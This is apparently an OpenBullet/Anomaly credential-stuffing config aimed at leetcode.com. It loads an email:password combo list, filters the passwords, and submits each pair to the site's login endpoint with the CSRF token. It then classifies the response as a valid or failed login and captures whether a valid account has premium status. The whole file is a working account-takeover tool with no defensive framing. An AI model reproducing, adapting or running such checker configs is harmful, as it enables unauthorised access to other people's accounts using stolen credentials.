[SETTINGS]
{
  "Name": "leetcode.com",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-08-17T19:58:50.1065606+02:00",
  "AdditionalInfo": "",
  "Author": "Desme#5333",
  "Version": "1.3.7 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [
    {
      "SliceName": "<PASS>",
      "RuleType": 2,
      "RuleString": "8",
      "Id": 240797834
    },
    {
      "SliceName": "<PASS>",
      "RuleType": 0,
      "RuleString": "Digit",
      "Id": 1912577906
    },
    {
      "SliceName": "<USER>",
      "RuleType": 2,
      "RuleString": "3",
      "Id": 46696722
    }
  ],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://leetcode.com/accounts/login/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

REQUEST POST "https://leetcode.com/accounts/login/" Multipart 
  
  STRINGCONTENT "csrfmiddlewaretoken: <COOKIES(csrftoken)>" 
  STRINGCONTENT "login: <USER>" 
  STRINGCONTENT "password: <PASS>" 
  STRINGCONTENT "next: /problems" 
  HEADER "authority: leetcode.com" 
  HEADER "method: POST" 
  HEADER "path: /accounts/login/" 
  HEADER "scheme: https" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "origin: https://leetcode.com" 
  HEADER "referer: https://leetcode.com/accounts/login/" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" 
  HEADER "x-csrftoken: <COOKIES(csrftoken)>" 
  HEADER "x-requested-with: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "are not correct" 
  KEYCHAIN Success OR 
    KEY "<COOKIES(*)>" Contains "Successfully signed in" 

REQUEST GET "https://leetcode.com/problemset/all/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "isPremium: " "," -> CAP "Premium" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "<Premium>" Contains "false" 

